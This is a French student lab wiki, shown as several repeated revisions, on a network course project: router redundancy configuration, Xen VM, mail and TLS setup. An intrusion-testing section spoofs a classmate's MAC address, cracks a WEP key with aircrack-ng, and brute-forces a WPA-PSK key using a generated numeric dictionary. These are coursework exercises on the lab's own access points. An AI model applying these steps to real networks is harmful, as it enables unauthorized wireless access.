xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23143 TP sysres IMA2a5 2015/2016 G6 2015-11-23T15:14:11Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23106 TP sysres IMA2a5 2015/2016 G6 2015-11-20T11:32:20Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande 